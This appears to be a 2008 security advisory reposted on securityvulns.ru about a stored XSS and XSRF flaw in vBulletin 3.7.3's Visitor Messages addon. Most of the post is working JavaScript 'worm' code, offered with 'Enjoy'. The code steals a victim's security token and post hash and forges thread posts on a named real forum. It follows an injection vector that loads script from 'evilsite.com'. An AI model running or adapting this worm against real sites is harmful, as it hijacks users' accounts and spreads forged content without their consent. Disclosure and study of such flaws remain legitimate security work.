Security Advisory: vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Cross-Site Scripting vulnerabilities in Webglimpse
  boastMachine v3.1 Remote Sql Injection
  Social Engine 2.7 CRLF Injection + SQL injection

From: Maximize Designs <emeckz_(at)_gmail.com>
Date: 21.11.2008
Subject: vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm

/* -----------------------------
* Author      = Mx
* Title       = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm
* Software    = vBulletin
* Addon       = Visitor Messages
* Version     = 3.7.3
* Attack      = XSS/XSRF

- Description = A critical vulnerability exists in the new vBulletin 3.7.3
software which comes included
+ with the visitor messages addon (a clone of a social network
wall/comment
area).
- When posting XSS, the data is run through htmlentities(); before being
displayed
+ to the general public/forum members. However, when posting a new
message,
- a new notification is sent to the commentee. The commenter posts a XSS
vector such as
+ <script src="http://evilsite.com/nbd.js">, and when the commentee visits
usercp.php
- under the domain, they are hit with an unfiltered xss attach. XSRF is
also readily available
+ and I have included an example worm that makes the user post a new
thread
with your own
- specified subject and message.

* Enjoy. Greets to Zain, Ytcracker, and http://digitalgangster.com which
was the first subject
* of the attack method.
* ----------------------------- */

function getNewHttpObject() {
var objType = false;
try {
objType = new ActiveXObject('Msxml2.XMLHTTP');
} catch(e) {
try {
objType = new ActiveXObject('Microsoft.XMLHTTP');
} catch(e) {
objType = new XMLHttpRequest();
}
}
return objType;
}

function getAXAH(url){

var theHttpRequest = getNewHttpObject();
theHttpRequest.onreadystatechange = function() {processAXAH();};
theHttpRequest.open("GET", url);
theHttpRequest.send(false);

function processAXAH(){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {

var str = theHttpRequest.responseText;
var secloc = str.indexOf('var SECURITYTOKEN = "');
var sectok = str.substring(21+secloc,secloc+51+21);

var posloc = str.indexOf('posthash" value="');
var postok = str.substring(17+posloc,posloc+32+17);

var subject = 'subject text';
var message = 'message text';

postAXAH('http://digitalgangster.com/4um/newthread.php?do=postthread&
f=5',
'subject=' + subject + '&message=' + message +
'&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' + sectok +
'&f=5&do=postthread&posthash=' + postok +
'poststarttime=1&loggedinuser=1&sbutton=Submit+New+Thread&signatu
re=1&parseurl=1&emailupdate=0&polloptions=4');

}
}
}
}

function postAXAH(url, params) {
var theHttpRequest = getNewHttpObject();

theHttpRequest.onreadystatechange = function()
{processAXAHr(elementContainer);};
theHttpRequest.open("POST", url);
theHttpRequest.setRequestHeader('Content-Type',
'application/x-www-form-urlencoded; charset=iso-8859-2');
theHttpRequest.send(params);

function processAXAHr(elementContainer){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {

}
}
}
}

getAXAH('http://digitalgangster.com/4um/newthread.php?do=newthread&f=
5'<http://digitalgangster.com/4um/newthread.php?do=newthread&f=5%2
7>
);
document.write('<iframe src="
http://digitalgangster.com/4um/newthread.php?do=newthread&f=5">')
;